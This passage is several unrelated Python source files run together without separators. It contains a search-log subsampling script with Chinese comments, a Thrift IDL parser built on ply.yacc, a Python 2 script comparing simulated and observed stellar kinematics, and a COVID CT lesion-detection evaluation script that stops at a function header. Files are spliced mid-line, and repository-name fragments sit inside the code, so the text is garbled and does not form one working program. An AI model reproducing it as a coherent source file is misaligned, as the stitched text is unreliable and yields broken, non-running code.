IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'query_segments.txt')) vocabulary_query: Set[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'vocabulary_query.txt')) search_logs = RawSearchLogCollection.read(os.path.join(source_folder, 'search_logs_raw.csv')) IOHelper.LogPrint(f'完成,共 {len(search_logs)} 条 search log。') # ------------------------- IOHelper.LogPrint() IOHelper.LogPrint('正在采样子数据集...') if not os.path.exists(result_folder): os.makedirs(result_folder) item_ids_subset: Set[str] = set() user_ids_subset: Set[str] = set() # 产出一个集合 item_ids_subset # 过滤集合 search_logs if process_item_N_core: IOHelper.LogPrint(f'\n正在根据 item 的交互数量清洗数据...(最少 {N_core_item} 个)') # 记录所有 item 的交互数量 item_interaction_count_dict: Dict[str, int] = {item_id : 0 for item_id in item_ids} for log in search_logs: for id, flag in zip(log.item_ids, log.interactions): if flag > 0: item_interaction_count_dict[id] += 1 # 只保留交互数不少于 N 个的 item IOHelper.LogPrint(f'清洗前,每个 item 的平均交互数为:{sum(item_interaction_count_dict.values()) / len(item_interaction_count_dict)}') item_interaction_count_dict = {id : count for id, count in item_interaction_count_dict.items() if count >= N_core_item} IOHelper.LogPrint(f'清洗后,每个 item 的平均交互数为:{sum(item_interaction_count_dict.values()) / len(item_interaction_count_dict)}') item_ids_subset = set(item_interaction_count_dict.keys()) # 过滤 search logs IOHelper.LogPrint('正在清洗 search logs...') logs_temp = RawSearchLogCollection() for log in search_logs: log2 = log.subset(item_ids_subset) if len(log2.item_ids) > 0: logs_temp.append(log2) search_logs = logs_temp # 产出一个集合: # user_ids_subset if process_user_N_core: IOHelper.LogPrint(f'\n正在根据 user 的交互数量清洗数据...(最少 {N_core_user} 个)') # 记录所有 user 的交互数量 user_interaction_count_dict: Dict[str, int] = {user_id : 0 for user_id in user_ids} for log in search_logs: for flag in log.interactions: if flag > 0: user_interaction_count_dict[log.user_id] += 1 # 只保留交互数不少于 N 个的 user IOHelper.LogPrint(f'清洗前,每个 user 的平均交互数为:{sum(user_interaction_count_dict.values()) / len(user_interaction_count_dict)}') user_interaction_count_dict = {id : count for id, count in user_interaction_count_dict.items() if count >= N_core_user} IOHelper.LogPrint(f'清洗后,每个 user 的平均交互数为:{sum(user_interaction_count_dict.values()) / len(user_interaction_count_dict)}') user_ids_subset = set(user_interaction_count_dict.keys()) # 产出一个集合: # user_ids_subset if process_user_random_sample: IOHelper.LogPrint(f'\n正在随机选取 {N_sample_user} 个 user...') user_ids_subset = set(random.sample(user_ids, N_sample_user)) # 过滤集合 search_logs if process_user_N_core or process_user_random_sample: logs_temp = RawSearchLogCollection() for log in search_logs: if log.user_id in user_ids_subset: logs_temp.append(log) search_logs = logs_temp queries_segments_subset: Dict[str, str] = dict() vocabulary_query_subset: Set[str] = set() query_rdict = PreProcessHelper.GetReverseLookupDictionary(queries) # 如果针对 user 进行了筛选,那么 item_ids_subset 必须被重新计算 if process_user_N_core or process_user_random_sample: item_ids_subset = set() # 重建一些子集 for log in search_logs: if process_user_N_core or process_user_random_sample or (not process_item_N_core): item_ids_subset.update(log.item_ids) if (not process_user_N_core) and (not process_user_random_sample): user_ids_subset.add(log.user_id) if log.query not in queries_segments_subset.keys(): query_segment = query_segments[query_rdict[log.query]] queries_segments_subset[log.query] = query_segment vocabulary_query_subset.update(query_segment.split()) item_title_segments_subset = [] vocabulary_item_subset: Set[str] = set() item_ids_subset = list(item_ids_subset) item_id_rdict = PreProcessHelper.GetReverseLookupDictionary(item_ids) for id in item_ids_subset: segment = item_title_segments[item_id_rdict[id]] item_title_segments_subset.append(segment) vocabulary_item_subset.update(segment.split()) queries_subset = [] query_segments_subset = [] for query, segment in queries_segments_subset.items(): queries_subset.append(query) query_segments_subset.append(segment) IOHelper.LogPrint() IOHelper.WriteListToFile(item_ids_subset, os.path.join(result_folder, 'item_ids.txt')) IOHelper.WriteListToFile(item_title_segments_subset, os.path.join(result_folder, 'item_title_segments.txt')) IOHelper.WriteListToFile(vocabulary_item_subset, os.path.join(result_folder, 'vocabulary_item.txt')) search_logs.write(os.path.join(result_folder, 'search_logs_raw.csv')) IOHelper.WriteListToFile(user_ids_subset, os.path.join(result_folder, 'user_ids.txt')) IOHelper.WriteListToFile(queries_subset, os.path.join(result_folder, 'queries.txt')) IOHelper.WriteListToFile(query_segments_subset, os.path.join(result_folder, 'query_segments.txt')) IOHelper.WriteListToFile(vocabulary_query_subset, os.path.join(result_folder, 'vocabulary_query.txt')) IOHelper.LogPrint(f'采样完毕,共 {len(search_logs)} 条 search log。') IOHelper.EndLogging()from .ast import ( TypeAnnotation, # Container types Set, Map, List, # Basic types String, Binary, Slist, Bool, Byte, I16, I32, I64, Double, # Everything else Field, Function, Identifier, Service, Exception_, Struct, Const, Senum, Enum, EnumDef, Typedef, Include, Namespace, Thrift ) from .lexer import ( Lexer, Identifier as LexerIdentifier ) import ply.yacc as yacc class Parser(object): class Error(Exception): pass tokens = Lexer.tokens start = 'thrift' BASIC_TYPES = { 'binary': Binary, 'bool': Bool, 'byte': Byte, 'double': Double, 'i16': I16, 'i32': I32, 'i64': I64, 'slist': Slist, 'string': String, } @classmethod def default_action(cls, p, name=None): p[0] = ' '.join(map(str, filter(None, p[1:]))) if name: p[0] = '%s(%s)' % (name, p[0]) @classmethod def default_list_action(cls, p): if len(p) == 3: p[0] = (p[1] if p[1] else []) + [p[2]] else: p[0] = [] def p_empty(self, p): '''empty : ''' pass def p_thrift(self, p): '''thrift : header_list definition_list''' p[0] = Thrift(p) def p_header_list(self, p): '''header_list : header_list header | empty''' self.default_list_action(p) def p_header(self, p): '''header : include | NAMESPACE IDENTIFIER IDENTIFIER | NAMESPACE '*' IDENTIFIER | CPP_NAMESPACE IDENTIFIER | CPP_INCLUDE LITERAL | PHP_NAMESPACE IDENTIFIER | PY_MODULE IDENTIFIER | PERL_PACKAGE IDENTIFIER | RUBY_NAMESPACE IDENTIFIER | SMALLTALK_CATEGORY ST_IDENTIFIER | SMALLTALK_PREFIX IDENTIFIER | JAVA_PACKAGE IDENTIFIER | COCOA_PREFIX IDENTIFIER | XSD_NAMESPACE LITERAL | CSHARP_NAMESPACE IDENTIFIER | DELPHI_NAMESPACE IDENTIFIER''' if len(p) == 2: p[0] = p[1] else: p[0] = Namespace(p) def p_include(self, p): '''include : INCLUDE LITERAL''' p[0] = Include(p) def p_definition_list(self, p): '''definition_list : definition_list definition | empty''' self.default_list_action(p) def p_definition(self, p): '''definition : const | type_definition | service''' p[0] = p[1] def p_type_definition(self, p): '''type_definition : typedef | enum | senum | struct | exception''' p[0] = p[1] def p_typedef(self, p): '''typedef : TYPEDEF field_type IDENTIFIER type_annotations''' p[0] = Typedef(p) def p_comma_or_semicolon_optional(self, p): '''comma_or_semicolon_optional : ',' | ';' | empty''' self.default_action(p) def p_start_enum_counter(self, p): '''start_enum_counter : empty''' self._enum_counter = -1 def p_enum(self, p): '''enum : ENUM IDENTIFIER start_enum_counter '{' enum_def_list '}' type_annotations''' p[0] = Enum(p) def p_enum_def_list(self, p): '''enum_def_list : enum_def_list enum_def | empty''' self.default_list_action(p) def p_enum_def(self, p): '''enum_def : IDENTIFIER '=' INTCONSTANT type_annotations comma_or_semicolon_optional | IDENTIFIER type_annotations comma_or_semicolon_optional''' if p[2] == '=': self._enum_counter = p[3] else: self._enum_counter += 1 p[0] = EnumDef(p, self._enum_counter) def p_senum(self, p): '''senum : SENUM IDENTIFIER '{' senum_def_list '}' type_annotations''' p[0] = Senum(p) def p_senum_def_list(self, p): '''senum_def_list : senum_def | empty''' self.default_list_action(p) def p_senum_def(self, p): '''senum_def : LITERAL comma_or_semicolon_optional''' p[0] = p[1] def p_const(self, p): '''const : CONST field_type IDENTIFIER '=' const_value comma_or_semicolon_optional''' p[0] = Const(p) def p_const_value(self, p): '''const_value : INTCONSTANT | DUBCONSTANT | LITERAL | IDENTIFIER | const_list | const_map''' if isinstance(p[1], LexerIdentifier): p[1] = Identifier(p, 1) p[0] = p[1] def p_const_list(self, p): """const_list : '[' const_list_contents ']'""" p[0] = p[2] def p_const_list_contents(self, p): '''const_list_contents : const_list_contents const_value comma_or_semicolon_optional | empty''' p[0] = p[1] or [] if len(p) > 2: p[0].append(p[2]) def p_const_map(self, p): """const_map : '{' const_map_contents '}'""" p[0] = p[2] def p_const_map_contents(self, p): '''const_map_contents : const_map_contents const_value ':' const_value comma_or_semicolon_optional | empty''' # TODO(wickman) if this implies hashable lists/maps we should probably store lists as tuples # and maps as a tuple of tuples. p[0] = p[1] or {} if len(p) > 4: p[0][p[2]] = p[4] def p_struct_head(self, p): '''struct_head : STRUCT | UNION''' p[0] = p[1] def p_struct(self, p): '''struct : struct_head IDENTIFIER xsd_all '{' field_list '}' type_annotations''' p[0] = Struct(p) def p_xsd_all(self, p): '''xsd_all : XSD_ALL | empty''' p[0] = p[1] == 'xsd_all' def p_xsd_optional(self, p): '''xsd_optional : XSD_OPTIONAL | empty''' p[0] = p[1] == 'xsd_optional' def p_xsd_nillable(self, p): '''xsd_nillable : XSD_NILLABLE | empty''' p[0] = p[1] == 'xsd_nillable' def p_xsd_attributes(self, p): '''xsd_attributes : XSD_ATTRS '{' field_list '}' | empty''' p[0] = p[3] if p[1] else [] def p_exception(self, p): '''exception : EXCEPTION IDENTIFIER '{' field_list '}' type_annotations''' p[0] = Exception_(p) def p_service(self, p): '''service : SERVICE IDENTIFIER extends '{' flag_args function_list unflag_args '}' type_annotations''' p[0] = Service(p) def p_flag_args(self, p): '''flag_args : empty''' pass def p_unflag_args(self, p): '''unflag_args : empty''' pass def p_extends(self, p): '''extends : EXTENDS IDENTIFIER | empty''' p[0] = p[2] if p[1] else None def p_function_list(self, p): '''function_list : function_list function | empty''' self.default_list_action(p) def p_function(self, p): '''function : oneway function_type IDENTIFIER '(' field_list ')' throws type_annotations comma_or_semicolon_optional''' p[0] = Function(p) def p_oneway(self, p): '''oneway : ONEWAY | empty''' p[0] = p[1] == 'oneway' def p_throws(self, p): '''throws : THROWS '(' field_list ')' | empty''' p[0] = p[3] if p[1] else [] def p_field_list(self, p): '''field_list : field_list field | empty''' self.default_list_action(p) def p_field(self, p): '''field : field_identifier field_requiredness field_type IDENTIFIER field_value xsd_optional xsd_nillable xsd_attributes type_annotations comma_or_semicolon_optional''' p[0] = Field(p) def p_field_identifier(self, p): '''field_identifier : INTCONSTANT ':' | empty''' p[0] = p[1] def p_field_requiredness(self, p): '''field_requiredness : REQUIRED | OPTIONAL | empty''' p[0] = p[1] == 'required' def p_field_value(self, p): '''field_value : '=' const_value | empty''' p[0] = p[2] if p[1] else None def p_function_type(self, p): '''function_type : field_type | VOID''' p[0] = p[1] def p_field_type(self, p): '''field_type : IDENTIFIER | base_type | container_type''' if isinstance(p[1], LexerIdentifier): p[1] = Identifier(p, 1) p[0] = p[1] def p_base_type(self, p): '''base_type : simple_base_type type_annotations''' p[0] = p[1] p[0].add_annotations(p[2]) def p_simple_base_type(self, p): '''simple_base_type : STRING | BINARY | SLIST | BOOL | BYTE | I16 | I32 | I64 | DOUBLE''' p[0] = self.BASIC_TYPES[p[1]](p) def p_container_type(self, p): '''container_type : simple_container_type type_annotations''' p[0] = p[1] p[0].add_annotations(p[2]) def p_simple_container_type(self, p): '''simple_container_type : map_type | set_type | list_type''' p[0] = p[1] def p_map_type(self, p): """map_type : MAP cpp_type '<' field_type ',' field_type '>'""" p[0] = Map(p) def p_set_type(self, p): """set_type : SET cpp_type '<' field_type '>'""" p[0] = Set(p) def p_list_type(self, p): """list_type : LIST '<' field_type '>' cpp_type""" p[0] = List(p) def p_cpp_type(self, p): '''cpp_type : CPP_TYPE LITERAL | empty''' p[0] = p[2] if p[1] else None def p_type_annotations(self, p): '''type_annotations : '(' type_annotation_list ')' | empty''' p[0] = p[2] if p[1] else [] def p_type_annotation_list(self, p): '''type_annotation_list : type_annotation_list type_annotation | empty''' self.default_list_action(p) def p_type_annotation(self, p): '''type_annotation : IDENTIFIER '=' LITERAL comma_or_semicolon_optional''' p[0] = TypeAnnotation(p) def p_error(self, p): raise self.Error('Parse error: %s' % p) def __init__(self): self._lex = Lexer().build() self._yacc = yacc.yacc(module=self, write_tables=False, debug=False) def parse(self, data): return self._yacc.parse(data, lexer=self._lex, tracking=True) kcotar/Aquarius_membership import imp import astropy.units as un import astropy.coordinates as coord import matplotlib.pyplot as plt import gala.coordinates as gal_coord from astropy.table import Table from vector_plane_calculations import * from velocity_transformations import * imp.load_source('helper', '../tSNE_test/helper_functions.py') from helper import move_to_dir imp.load_source('gal_move', '../tSNE_test/convert_gal_movement.py') from gal_move import gal_uvw imp.load_source('veltrans', '../tSNE_test/velocity_transform.py') from veltrans import * # -------------------------------------------------------- # ---------------- FUNCTIONS ----------------------------- # -------------------------------------------------------- def _prepare_hist_data(d, bins, range, norm=True): heights, edges = np.histogram(d, bins=bins, range=range) width = np.abs(edges[0] - edges[1]) if norm: heights = 1.*heights / np.max(heights) return edges[:-1], heights, width def _get_range(data, perc_cut=2.): return (np.nanpercentile(data, perc_cut), np.nanpercentile(data, 100-perc_cut)) # return (np.nanmin(data), np.nanmax(data)) def plot_hist(obs, obs_f, galx, galx_f, path=None, title='', hist_bins = 100): hist_range = _get_range(obs[obs_f]) # zgal_range = _get_range(galaxia_sub['pz']) plt.title(title) h_edg, h_hei, h_wid = _prepare_hist_data(obs[obs_f], hist_bins, hist_range, norm=True) plt.bar(h_edg, h_hei, width=h_wid, color='green', alpha=0.2) h_edg, h_hei, h_wid = _prepare_hist_data(galx[galx_f], hist_bins, hist_range, norm=True) plt.bar(h_edg, h_hei, width=h_wid, color='blue', alpha=0.2) plt.show() plt.close() # -------------------------------------------------------- # ---------------- CONSTANTS AND SETTINGS ---------------- # -------------------------------------------------------- # GALAH # simulation_dir = '/home/klemen/GALAH_data/Galaxia_simulation/GALAH/' # simulation_ebf = 'galaxy_galah_complete.ebf' # simulation_ebf = 'galaxy_galah_fields.ebf' # RAVE simulation_dir = '/home/klemen/GALAH_data/Galaxia_simulation/RAVE/' simulation_ebf = 'galaxy_rave_complete.ebf' simulation_fits = simulation_ebf.split('.')[0]+'.fits' obs_file_fits = 'RAVE_GALAH_TGAS_stack.fits' # analysis constants l_center = 310. b_center = -70. r_center = 10. # -------------------------------------------------------- # ---------------- INPUT DATA HANDLING ------------------- # -------------------------------------------------------- print 'Reading data' glaxia_data = Table.read(simulation_dir + simulation_fits) obs_data = Table.read(obs_file_fits) obs_data = obs_data.filled() # compute observation galactic coordinates l_b_obs = coord.ICRS(ra=obs_data['ra_gaia']*un.deg, dec=obs_data['dec_gaia']*un.deg).transform_to(coord.Galactic) obs_data['l'] = l_b_obs.l.value obs_data['b'] = l_b_obs.b.value # create a subset of data lb_center = coord.Galactic(l=l_center*un.deg, b=b_center*un.deg) xyz_vel_stream = compute_xyz_vel(np.deg2rad(lb_center.l.value), np.deg2rad(lb_center.b.value), 10) galaxia_sub = glaxia_data[coord.Galactic(l=glaxia_data['glon']*un.deg, b=glaxia_data['glat']*un.deg).separation(lb_center) < r_center*un.deg] obs_sub = obs_data[coord.Galactic(l=obs_data['l']*un.deg, b=obs_data['b']*un.deg).separation(lb_center) < r_center*un.deg] print 'Galaxia stars: '+str(len(galaxia_sub)) print 'Observation stars: '+str(len(obs_sub)) galaxia_sub['px'] *= 1e3 # kpc to pc conversion galaxia_sub['py'] *= 1e3 galaxia_sub['pz'] *= 1e3 # galaxia_sub['vx'] *= -1. # it has different orientation than our coordinate system # compute galactic velocities and positions for the obs stars obs_gal_coord = coord.Galactic(l=obs_sub['l']*un.deg, b=obs_sub['b']*un.deg, distance=1e3/obs_sub['parallax'].data*un.pc) obs_gal_xyz = obs_gal_coord.cartesian obs_sub['x_gal'] = obs_gal_xyz.x.value obs_sub['y_gal'] = obs_gal_xyz.y.value obs_sub['z_gal'] = obs_gal_xyz.z.value plot_hist(obs_sub, 'x_gal', galaxia_sub, 'px', path=None, title='') plot_hist(obs_sub, 'y_gal', galaxia_sub, 'py', path=None, title='') plot_hist(obs_sub, 'z_gal', galaxia_sub, 'pz', path=None, title='') # convert velocities from ra/de/pmra/pmdec to more consisten units u_gal, v_gal, w_gal = gal_uvw(obs_sub['ra_gaia'], obs_sub['dec_gaia'], obs_sub['pmra'], obs_sub['pmdec'], obs_sub['RV'], plx=obs_sub['parallax']) obs_sub['u_gal'] = u_gal * -1. obs_sub['v_gal'] = v_gal obs_sub['w_gal'] = w_gal ra_dec_pm = np.vstack((obs_sub['pmra'], obs_sub['pmdec'])) * un.mas/un.yr l_b_pm = gal_coord.pm_icrs_to_gal(coord.ICRS(ra=obs_sub['ra_gaia']*un.deg, dec=obs_sub['dec_gaia']*un.deg), ra_dec_pm) obs_sub['pml'] = l_b_pm[0].value obs_sub['pmb'] = l_b_pm[1].value xyz_vel = motion_to_cartesic(np.array(obs_sub['l']), np.array(obs_sub['b']), np.array(obs_sub['pml']), np.array(obs_sub['pmb']), np.array(obs_sub['RV']), plx=np.array(obs_sub['parallax'])) obs_sub['vx_gal'] = xyz_vel[0] obs_sub['vy_gal'] = xyz_vel[1] obs_sub['vz_gal'] = xyz_vel[2] # plot_hist(obs_sub, 'u_gal', obs_sub, 'vx_gal', path=None, title='') # plot_hist(obs_sub, 'v_gal', obs_sub, 'vy_gal', path=None, title='') # plot_hist(obs_sub, 'w_gal', obs_sub, 'vz_gal', path=None, title='') plot_hist(obs_sub, 'u_gal', galaxia_sub, 'vx', path=None, title='') plot_hist(obs_sub, 'v_gal', galaxia_sub, 'vy', path=None, title='') plot_hist(obs_sub, 'w_gal', galaxia_sub, 'vz', path=None, title='') xyz_pos_stars = np.vstack((obs_sub['x_gal'],obs_sub['y_gal'],obs_sub['z_gal'])).T xyz_vel_stars = np.vstack((obs_sub['u_gal'],obs_sub['v_gal'],obs_sub['w_gal'])).T print xyz_pos_stars print xyz_vel_stars print xyz_vel_stream obs_plane_intersects_3D = stream_plane_vector_intersect(xyz_pos_stars, xyz_vel_stars, xyz_vel_stream) obs_plane_intersects_2D = intersects_to_2dplane(obs_plane_intersects_3D, xyz_vel_stream) xyz_pos_stars = np.vstack((galaxia_sub['px'],galaxia_sub['py'],galaxia_sub['pz'])).T xyz_vel_stars = np.vstack((galaxia_sub['vx'],galaxia_sub['vy'],galaxia_sub['vz'])).T galaxia_plane_intersects_3D = stream_plane_vector_intersect(xyz_pos_stars, xyz_vel_stars, xyz_vel_stream) galaxia_plane_intersects_2D = intersects_to_2dplane(galaxia_plane_intersects_3D, xyz_vel_stream) plot_lim = (-1000, 1000) # Create a plot fig, ax = plt.subplots(1, 1) ax.scatter(obs_plane_intersects_2D[:, 0], obs_plane_intersects_2D[:, 1], lw=0, c='red', s=2, alpha=1.) ax.scatter(galaxia_plane_intersects_2D[:, 0], galaxia_plane_intersects_2D[:, 1], lw=0, c='blue', s=2, alpha=1.) ax.scatter(0, 0, lw=0, c='black', s=10, marker='*') # solar position ax.set(xlabel='X stream plane', ylabel='Y stream plane', xlim=plot_lim, ylim=plot_lim) fig.tight_layout() plt.show() plt.close() 10-100 #!/usr/bin/env python import argparse import os import sys import csv import h5py import tensorflow.keras as keras import tensorflow as tf import numpy as np from tqdm import tqdm import cv2 import SimpleITK as sitk import time tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR) tf.compat.v1.enable_v2_behavior() if __name__ == "__main__" and __package__ is None: sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..')) import fl_covid.bin # noqa: F401 __package__ = "fl_covid.bin" # Change these to absolute imports if you copy this script outside the fl_covid package. from ..utils.anchors import compute_overlap from .. import models from ..preprocessing.csv_generator import CSVGenerator from ..utils.eval import _compute_ap, _get_annotations, _get_annotations_and_img_path from ..utils.config import read_config_file, parse_anchor_parameters from ..utils.keras_version import check_keras_version from ..utils.visualization import draw_detections, draw_annotations from keras_retinanet.utils.visualization import draw_box, label_color, draw_caption from keras_retinanet.bin.train_edit import create_models from keras_retinanet.layers.filter_detections import filter_detections from keras_retinanet.utils.image import preprocess_image, resize_image from keras_retinanet.bin.evaluate_internal_patient_wise import draw_colorful_result, evaluate_from_npy def get_session(): """ Construct a modified tf session. """ config = tf.ConfigProto() config.gpu_options.allow_growth = True return tf.Session(config=config) def draw_detections(image, boxes, scores, labels, color=None, label_to_name=None, slice_id=None, bbox_writer=None, score_threshold=0.4): # score_threshold used to be 0.5 """ Draws detections in an image. # Arguments image : The image to draw on. boxes : A [N, 4] matrix (x1, y1, x2, y2). scores : A list of N classification scores. labels : A list of N labels. color : The color of the boxes. By default the color from keras_retinanet.utils.colors.label_color will be used. label_to_name : (optional) Functor for mapping a label to a name. score_threshold : Threshold used for determining what detections to draw. """ selection = np.where(scores > score_threshold)[0] for i in selection: c = color if color is not None else label_color(labels[i]) if bbox_writer is not None and slice_id is not None: tar_path = 'slice_{}.png'.format(slice_id) b = np.array(boxes[i, :]).astype(int) bbox_writer.writerow([tar_path]+ [b[0],b[1],b[2],b[3]]+['lesion']) draw_box(image, boxes[i, :], color=c) # draw labels caption = (label_to_name(labels[i]) if label_to_name else str(labels[i])) + ': {0:.2f}'.format(scores[i]) draw_caption(image, boxes[i, :], caption) def create_generator(args): """ Create generators for evaluation. """ if args.dataset_type == 'csv': validation_generator = CSVGenerator( args.annotations, args.classes, image_min_side=args.image_min_side, image_max_side=args.image_max_side, config=args.config, shuffle_groups=False ) else: raise ValueError('Invalid data type received: {}'.format(args.dataset_type)) return validation_generator def _seg_filter(bboxes,scores_sort,seg): # print('scores_sort') # print(scores_sort.shape) # print(scores_sort) # print('indices') # print(type(indices[scores_sort])) # print(indices[scores_sort]) # print(indices) # # select detections # image_boxes = boxes[0, indices[scores_sort], :] # print('seletec_boxes', image_boxes.shape) # print(type(image_boxes)) # print(image_boxes) # image_boxes_filtered = [] # seg = cv2.imread('/Users/jemary/Data/DataSet/COVID-19/COVID-19 image data collection(public1)/007_seg/slice_seg_{}.png'.format(img_idx)) # print(seg.shape) image_boxes = bboxes inner = np.asarray([],dtype=np.bool) flag = False for i in range(image_boxes.shape[0]): x1 = int(image_boxes[i][0]) y1 = int(image_boxes[i][1]) x2 = int(image_boxes[i][2]) y2 = int(image_boxes[i][3]) x1 = 511 if x1 > 511 else x1 y1 = 511 if y1 > 511 else y1 x2 = 511 if x2 > 511 else x2 y2 = 511 if y2 > 511 else y2 # print(scores_sort) # print(scores_sort.shape) if (seg[y1,x1,:] == 0).all() and (seg[y2,x2,:] == 0).all() and (seg[y1,x2,:] == 0).all() and (seg[y2,x1,:] == 0).all(): inner = np.append(inner,False) flag=True # scores_sort = np.delete(scores_sort,i,axis=0) else: inner = np.append(inner, True) # print(inner) # cnt = 1 # if flag: # if cnt > 0: # print("FP out of lung filtered") # cnt -= 1 scores_sort = scores_sort[inner] # print('scores_sort after filter') # print(scores_sort.shape) # print(scores_sort) return scores_sort def _print_ensemble_detections_to_npy(args, generator, model_list, client_idx, client_name, patient_name, score_threshold=0.05, max_detections=100, save_path=None): all_detections = [[None for i in range(generator.num_classes()) if generator.has_label(i)] for j in range(generator.size())] detection_out = np.zeros([generator.size(),512,512,3]) # detection_out = np.zeros([generator.size(),512,512]) attention_out = np.zeros([generator.size(),512,512]) mask_out = np.zeros([generator.size(),512,512]) results = open(os.path.join(save_path, '{}_{}_output_bbox.csv'.format(client_name, patient_name)), 'w', newline='') result_writer = csv.writer(results, delimiter=',') for i in tqdm(range(generator.size()), desc='Running network on {} {}: '.format(client_name, patient_name)): raw_image = generator.load_image(i) # image = np.expand_dims(raw_image.copy(), axis=-1) # image = np.repeat(image, 3, axis=-1) # image = generator.preprocess_image(image) image = generator.preprocess_image(raw_image.copy()) image, scale = generator.resize_image(image) if keras.backend.image_data_format() == 'channels_first': image = image.transpose((2, 0, 1)) # run network # boxes, scores, labels = model.predict_on_batch(np.expand_dims(image, axis=0))[:3] all_boxes = np.empty([1,0,4],dtype=np.float32) all_scores = np.empty([1,0], dtype=np.float32) all_labels = np.empty([1,0], dtype=np.int32) masks = np.zeros([1,512,512,1], dtype=np.float32) attention_map = np.zeros([1,512,512,1], dtype=np.float32) for site_model in model_list: site_boxes, site_scores, site_labels, site_masks, site_attention_map = site_model.predict_on_batch(np.expand_dims(image, axis=0)) site_boxes = site_boxes.numpy() site_scores = site_scores.numpy() site_labels = site_labels.numpy() site_masks = site_masks.numpy() site_attention_map = site_attention_map.numpy() if np.squeeze(site_attention_map).shape[0] !=512: resized_attn_map = cv2.resize(np.squeeze(site_attention_map),(512,512)) site_attention_map = np.expand_dims(resized_attn_map,axis=-1) site_attention_map = np.expand_dims(site_attention_map,axis=0) all_boxes = np.concatenate([all_boxes, site_boxes],axis=-2) all_scores = np.concatenate([all_scores, site_scores],axis=-1) all_labels = np.concatenate([all_labels, site_labels],axis=-1) masks = np.add(masks, site_masks/len(model_list)) attention_map = np.add(attention_map, site_attention_map/len(model_list)) # print('-------------EACH MODEL----------') # print('----boxes----') # print(type(site_boxes)) # print(site_boxes.shape) # print(site_boxes.dtype) # print('----scores----') # print(type(site_scores)) # print(site_scores.shape) # print(site_scores.dtype) # print('----labels----') # print(type(site_labels)) # print(site_labels.shape) # print(site_labels.dtype) # print('----masks----') # print(type(site_masks)) # print(site_masks.shape) # print(site_masks.dtype) # print('----attn map----') # print(type(site_attention_map)) # print(site_attention_map.shape) # print(site_attention_map.dtype) # print('total_boxes') # print(all_boxes.shape) # print(all_boxes.dtype) # print('total_scores') # print(all_scores.shape) # print(all_scores.dtype) # print('total_labels') # print(all_labels.shape) # print(all_labels.dtype) # print(np.squeeze(all_boxes).shape) # print(np.expand_dims(np.squeeze(all_scores),axis=-1).shape) out_boxes, out_scores, out_labels = filter_detections( np.squeeze(all_boxes), np.expand_dims(np.squeeze(all_scores),axis=-1), other=[], class_specific_filter=True, nms=True) out_boxes = np.expand_dims(np.squeeze(out_boxes),axis=0) out_scores = np.expand_dims(np.squeeze(out_scores),axis=0) out_labels = np.expand_dims(np.squeeze(out_labels),axis=0) # print('boxes:', out_boxes.shape) # print('scores:', out_scores.shape) # print('labels',out_labels.shape) boxes = out_boxes.copy() scores = out_scores.copy() labels = out_labels.copy() # correct boxes for image scale boxes /= scale # select indices which have a score above the threshold indices = np.where(scores[0, :] > -1)[0] # print('indices', indices) # print(type(scores)) if type(scores) is not np.ndarray: scores = scores.numpy() boxes = boxes.numpy() labels = labels.numpy() masks = masks.numpy() attention_map = attention_map.numpy() # select those scores scores = scores[0][indices] # find the order with which to sort the scores scores_sort = np.argsort(-scores)[:max_detections] image_boxes = boxes[0, indices[scores_sort], :] # print('seletec_boxes',image_boxes.shape) # print(image_boxes) # filter out of lung if args.lung_filter: client_paths = ['private_1', 'private_2', 'private_3'] # client_paths = ['private_4/B'] lung_filter_path = '/research/dept8/qdou/data/covid/{}/lung_seg_png/'.format(client_paths[client_idx]) # lungfilter = '/covid/private_2/lung_seg_png/ # print('---img path---') img_path = generator.image_path(i) patient = img_path.split('/')[-2] slice_idx = img_path.split('/')[-1].replace('slice_', '').replace('.h5', '') # print('patient:', patient) # print('slice:', slice_idx) seg_path = os.path.join(lung_filter_path,'{}_slice_{}.png').format(patient,slice_idx) # print(seg_path) seg = cv2.imread(seg_path) scores_sort = _seg_filter(image_boxes,scores_sort,seg) image_boxes = boxes[0, indices[scores_sort], :] image_scores = scores[scores_sort] image_labels = labels[0, indices[scores_sort]] image_detections = np.concatenate([image_boxes, np.expand_dims(image_scores, axis=1), np.expand_dims(image_labels, axis=1)], axis=1) # copy detections to all_detections for label in range(generator.num_classes()): if not generator.has_label(label): continue all_detections[i][label] = image_detections[image_detections[:, -1] == label, :-1] if args.save_result == 1: img_path = generator.image_path(i) img_path = img_path.replace('h5_normalize', 'h5') # print(img_path) with h5py.File(img_path, "r") as hf: h5_raw_image = hf['arr'][:] draw_annotations(h5_raw_image, generator.load_annotations(i), label_to_name=generator.label_to_name) # draw_detections(raw_image, image_boxes, image_scores, image_labels, score_threshold=args.score_threshold, label_to_name=generator.label_to_name) draw_detections(h5_raw_image, image_boxes, image_scores, image_labels, slice_id=i, bbox_writer=result_writer, score_threshold=args.score_threshold) # if args.lung_filter: # slice_idx = generator.image_path(i).split('/')[-1].replace('slice', '').replace('.png', '') # cv2.imwrite('../COVID/slice_{}.png'.format(slice_idx),raw_image) # print("Shape of load Image") # print(arr.shape) detection_out[i, :, :] = h5_raw_image attention_map[np.where(attention_map < args.attention_threshold)] = 0 # attention_out[i, :, :] = cv2.flip( cv2.resize(np.squeeze(np.uint8(attention_map * 255)), (origin_shape[1], origin_shape[0])), 0) attention_out[i, :, :] = cv2.resize(np.squeeze(np.uint8(attention_map * 255)), (512, 512)) masks[masks < args.segmentation_threshold] = 0 masks = cv2.resize(np.squeeze(np.uint8(masks * 255)), (512, 512)) mask_out[i, :, :] = masks if save_path is not None and args.save_result == 1: print('Writing Results...') # detection_out = sitk.GetImageFromArray(detection_out) # sitk.WriteImage(detection_out, os.path.join(save_path, '{}_{}_detection_result.nii.gz'.format(client_name, patient_name))) # attention_out = sitk.GetImageFromArray(attention_out) # sitk.WriteImage(attention_out, os.path.join(save_path, '{}_{}_attention_result.nii.gz'.format(client_name, patient_name))) mask_out = sitk.GetImageFromArray(mask_out) sitk.WriteImage(mask_out, os.path.join(save_path, '{}_{}_masks_result.nii.gz'.format(client_name, patient_name))) np.save(os.path.join(save_path, '{}_{}_prediction.npy'.format(client_name, patient_name)), all_detections) all_annotations, all_annotations_img_path = _get_annotations_and_img_path(generator) np.save(os.path.join(save_path, '{}_{}_annotations.npy'.format(client_name, patient_name)), all_annotations) np.save(os.path.join(save_path, '{}_{}_annotations_img_path.npy'.format(client_name, patient_name)), all_annotations_img_path) return 0 def parse_args(args): """ Parse the arguments. """ 